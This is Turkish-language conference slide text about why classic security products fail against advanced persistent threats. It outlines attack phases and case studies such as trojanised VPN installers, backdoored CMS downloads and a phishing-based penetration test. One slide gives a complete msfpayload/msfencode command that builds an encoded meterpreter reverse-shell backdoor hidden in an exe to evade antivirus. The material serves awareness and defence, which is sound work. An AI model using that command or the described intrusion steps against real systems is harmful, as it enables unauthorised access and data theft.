APT Saldırıları Karşısında Güvenlik Sistemlerinin Yetersizliği Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ [email protected] Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Huzeyfe ÖNAL •  Bilgi Güvenliği Danışmanı & Ağ Güvenliği Araş<rmacısı @BGA •  PenetraAon Tester •  Eğitmen –  Bilgi Güvenliği AKADEMİSİ –  Linux AKADEMİ •  ÖğreAm Görevlisi Bilgi / Bahçeşehir Üniversitesi •  Blogger -­‐ www.lifeoverip.net Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Amaç •  Günümüz güvenlik problemlerinin temelini oluşturan son kullanıcı farkındalık eksikliği ve zararlı yazılımlar karşısında Firewall/IPS/AnAvirüs gibi klasik siber güvenlik sistemlerinin yetersizliğinin anlaşılması. Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR !! Uyarı !!
Bu sunumda geçen tüm olaylar ve ekran görüntülerinin gerçek kişilerle ilgisi yoktur, sanal dünyadan alınmış[r. Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR 10 Sene Önce Siber Dünya Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Geleneksel Güvenlik Yaklaşımı •  Network, işleAm sistemi ve servis güvenliği •  Router(ACL), Firewall –  Intrusion DetecAon System •  Intrusion PrevenAon System »  .... •  Bütçenin tamamına yakını standart savunma sistemleri için ayrılır. •  Kullanıcılara yönelik tehdit genellikle es geçilir –  “...Onun zaten farkındayız” yaklaşımı •  GerçekleşArilen güvenlik testleri kontrol listesindeki bir maddeyi daha geçebilmek için yap<rılır. Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Katmanlı Güvenlik Mimarisi(?) •  Güvenlik ürünleri listesi –  Güvenlik duvarı –  Saldırı Tespit ve Engelleme Sistemi –  AnAvirüs, AnAspam, AnA… –  NAC, 802.1x çözümü –  DLP •  Güvenliğin artması para harcama ile doğru oran<lı değildir •  Katmanlı güvenlik mimarisini yanlış anlama Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Sorularla Güvenliğimiz… •  Kaç kişi/kurum son bir yıl içerisinde APT benzeri sofisAke bir saldırıya maruz kaldı •  Daha da önemlisi kaç kişi/kurum bu saldırıya maruz kaldığını tespit ej ve nasıl/ne zaman? •  Daha daha da önemlisi kaç kurum bu Ap saldırıyla karşı karşıya kaldığından habersiz? •  BGA’dan örnekleri… –  Kamu / Özel sektör Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR APT Kavramı •  A.P.T (Advanced Persistent Threat) 2010 yılında gündemimize girmiş “görece olarak” yeni bir konu. –  Yeni arayışlar ve sektöre heyecan katmak amacıyla gelişArilmiş bir konu mu? –  Çok daha öncesinden varolan fakat yeteri kadar önem verilmeyen, büyük firmaları hedef alındığında gerçek önemi ortaya çıkan bir konu mu? •  Teknik olarak eski yöntemler, yeni moAvasyonlar •  Güvenlikcilerin 0-­‐3 yenik başladığı bir kavram Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR APT ile Mücadele •  APT kolay tanımlanabilir bir konu olmadığı için mücadelesi de zordur, •  Mücadelede en önemli husus kime karşı neyin mücadelesinin verildiğidir –  Saldırgan gibi düşünebilmek ve onların yeteneklerini simule etmek hayaA öneme sahipAr. •  Tanımlanabilir tehditleri engellemek kolaydır •  Hata: Kolay tanımlanabilir olmayan riskleri eski man<kla çözmeye kalkmak… –  AV firmalarının APT ile uğraşması… Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR APT Saldırı Anatomisi Kaynak: RSA güv. konferansı Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR APT Yaşam Döngüsü Faz Ak^vite Detaylar I.  Faz Keşif, hedef belirleme Hedefin ve hedefe ulaşılabilecek yolların tespit edilmesi II. Faz Oltalama e-­‐postasının gönderilmesi Genellikle bu yöntem tercih edilir (kolay, zahmetsiz ve az teknik detay gerekArdiğinden) III. Faz IV. Faz Hedefle irAbata geçme Hedef sisteme arka kapı yükleme Hak yükseltme, hedef alanını genişletme Hedef sistemde daha yüksek yetkili kullanıcı haklarına geçiş, farklı ağları keşif V. Faz Veri Kaçırma Hedef sistemden ilgili verilerin şifrelenerek dışarı çıkar<lması, yedeklenmesi VI. Faz Erişimi kalıcı kılma İstenildiğinde tekrar bağlanılabilecek bir yapıyı kurup , logların ve diğer delillerin silinmesi. Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR APT MoAvasyonu ve Akçeli İşler •  APT saldırılarında en önemli bileşen saldırganın moAvasyonudur. –  Bu moAvasyon genellikle maddi karşılık<r. •  Saldırganın moAvasyon durumuna göre APT saldırısı 1 gün de sürebilir 4 yıl da sürebilir. –  0 day exploit çıkması için beklenen süre v.s –  Hacklenen 3. parA yazılımın güncellenmesini bekleme Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Türkiye’den İstaAsAkler Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Hatalı APT Yaklaşımları… •  Bize birşey olmaz yaklaşımı –  Saldırgan bula bula bizi mi bulacakJ •  Sadece ürünle çözmeye çalışmak •  Sadece ağ trafiği dinleyerek çözmeye çalışmak •  Farkındalık+APT ürünü+log yöneAmi+offsec Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Örnek APT Senaryo İncelemeleri 1 Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul 2 BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Senaryo-­‐I •  Sebep:Farkındalık ve son kullanıcı güvenlik önlemlerinin yetersiz olması •  Hikaye: Saldırgan ipsec VPN kullanan firmaları hedef alarak erişim bilgilerini toplayarak bunları satmak ister. Bunun için bir adet tuzak sistem kurar (kurulu sistemi hackler) ve arama motorları sonuçlarına güvenen son kullanıcıları avlamaya başlar. •  Günün sonunda başladığı yerden bir mil ötede hiç hesaba katmadığı firmaların iç ağlarına erişip hassas çizimleri başkalarına para karşılığında satar Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR •  Senaryo internet üzerinden bir exe dosyasının indirilmesi ile başlar –  Internet üzerinden exe yasaklanabilir (?) •  Senaryodaki .exe yerine .pdf, .zip, xls, .doc ve benzeri uzan<lar kullanılabilir veya uzan<ya gerek olmadan yeni çıkmış 0 day açıklardan biri kullanılarak Explorer ve benzeri browserlar üzerinden işlem yap<rılabilir. Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Keşif, Bilgi Toplama ve Tuzak Adımı •  Saldırgan Google kullanarak VPN istemcisi ara<r ve ilk sayfada çıkan linke <klayarak programı indirir •  Bilgisayarına programı kurar ve VPN bağlan<sını başla<r. •  Saldırgan program çalış<ğında son kullanıcı bilgisayarına erişim sağlar Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR İlk Adım Zorlukları •  Google’da ilk sayfada çıkan sistemin hacklenmesi –  SSL heartbleed açıklığı sonrası durum •  İlk sayfada çıkan sistem hacklenemiyorsa yeni bir site kurup Black Seo yöntemleri ile ilk sayfaya alınması •  Hemen her gün yeni güvenlik zafiyetleri yayınlanır Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR VPN İstemci Programına Arka kapı YerleşArme •  msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.106 R | msfencode -­‐t exe -­‐x template_x86_windows.exe -­‐k -­‐o nt_backdoor.exe -­‐
e x86/shikata_ga_nai -­‐c 5 Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR AnA-­‐(Virus/Malware/…) Atlatma Özelliği Ekleme •  Klasik güvenlik korumaları Aspirin gibidir. Bilinen basit durumlar için işe yarar. •  ÜreAlen zararlı yazılımların %80 civarının yaşam süresi 3 saajr. Bunun içinde tek kullanımlık malware oranı %70’dir. Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR AV’ler Tara}ndan Tanınmaz Zararlı Oluşturma Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Örnek Uygulama Çık<sı Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Bekleme Süresi •  APT saldırılarında en önemli hususlardan biri saldırganın acelesinin olmamasıdır. •  Saldırgan ağını hazırlar, kurar ve uzun bir süre bekler. •  Örnek senaryoda 6 ay civarında bir bekleme süresi olduğu tespit edilmişAr. Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Hassas Bilgilerin Elde Edilmesi Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR FTP Erişimi ve FTP’deki Dosyalara Arka Kapı YerleşArme •  Saldırgan elde ejği erişim bilgilerini kullanarak FTP sunucuya bağlanır ve FTP sunucuda en son güncellenen dosyaları inceleyerek orjinallerini arka kapılı sürümleriyle değişArir. •  3 gün sonra ip adresi X.y.z.t’li bir istemcinin merkezi komuta sistemine bağlandığını görür. •  Hızlıca ilgili kullanıcının bilgisayarına erişim sağlar •  Bilgisayar firmanın help desk birimi çalışanına aijr ve en yetkili kullanıcı hesabı bilgisayara login olmuştur. •  Bellek dökümü yaparak parolanın açık hali elde edilir Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Sunucu Taraflı bir APT •  Saldırgan çok bilinen bir blog/cms sisteminin Türkiye sitesini hackler –  Parola tahmini •  Bir sonraki sürüm için zaman sayar ve yeni sürüm çık<ğında siteye eklenen yeni Türkçe sürüm dosyaları içine bir adet arka kapı barındıran php dosyası ekler, hash değerlerini değişArir. •  Bir ha€a sonra ilgili dosyanın download sayısı 173.000 olmuştur. •  Saldırgan tek bir harekeA ile 173.000 sisteme arka kapı bırakır. Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Apt devam… •  Sunucu loglarından ilgili dosyaları indiren ip adresleri tespit edilip hangilerinde blog yazılımı kurulu belirlenir ve arka kapıların hangi sistemlerde olduğu tespit edilir. •  Arka kapı üzerinden sunucu ele geçirilir –  Windows uzerinde Apache Admin hakları ile çalışmaktadır •  DMZ bölgesindeki diger sunuculara PassThe Hash yöntemi ile erişim sağlanır ve veritabanı sunucusundan yerel ağa erişilir… Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Türkiye’den Örnek APT TesA ve Sonucu •  Firma ile anlaşma yapılır –  Gizlilik sözleşmesinde geçen firma ismi hariç hiç bilgi alınmamış<r. –  Sosyal ağ sitelerinden araş<rma yapılarak hedef 50 kişi belirlenir. (LinkedIN) –  Firmanın twi‚er/facebook sayfaları takip edilerek kampanya/duyuru zamanı beklenir. –  Kampanya ile ilgili siteye benzer alan adı alınarak SPF kayıtları, MX kayıtları girilir ve sahte e-­‐posta hazırlanır. •  50 çalışana e-­‐posta gönderilir ve beklemeye alınır. Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR •  Ilk 10 dakika içinde 7 kullanıcı sisteme erişmeye çalışır. •  Hızlıca kullanıcıların hesap bilgileri kullanılarak webmail sistemine erişim sağlanır –  Tüm kullanıcı bilgisi alınır (bağlı olunan birim ve tel numaraları dahil) Anahtar kelime araması gerçekleşArilir (*.pcf) Bir adet vpn config ve user/pass elde edilir Vpn kurulumu icin gece 03:00 beklenir VPN kurulur yerel ağa bağlan< sağlanır, RDP üzerinden parolası alınan bilgisayara bağlanılır. •  AV durduruldu, kalıcı arka kapı yüklendi, yerel ağ portları tarandı DB bulundu, erişim sağlandı… • 
• 
• 
• 
Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Kuruma Ödev •  Testleri tamamladıktan sonra saldırı tespit ve engelleme sistemini uyaracak çeşitli sahte ataklar düzenlendi. •  Kuruma bir ha€a içerisinde gerçekleşArilen siber saldırı simulasyonu sonucunda eldeki bulguları soruldu –  IPS logları haric elle tutulur hicbir bilgi gelmedi. •  Kısacası kurum yap<ğı milyon dolarlık ya<rımın gerçek bir APT saldırısı karşısında kendisini savunamayacağını gördü… Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Sonuç •  Siber dünyada güvenliğimiz sadece bize ve sınırlarımıza bağlı değildir. •  Özellikle hizmet alınan 3. parA firmalar ve bunların erişimleri/yetkileri büyük problemdir. •  Internet üzerinden elde edilen veya yerel ağda dolaşımda olan her tür çalış<rılabilir dosya kontrolden geçmeli. •  APT teknik bir problemden öte iş dünyasını ilgilendiren hassas bir konudur. Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR İleAşim Bilgileri Blog •  www.lifeoverip.net •  Blog.bga.com.tr Twi‚er •  @bgasecurity •  @huzeyfeonal İleAşim •  [email protected] •  [email protected] Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR 
Download

bga_3_apt saldırıları karşısında güvenlik sistemlerin yetersiziliği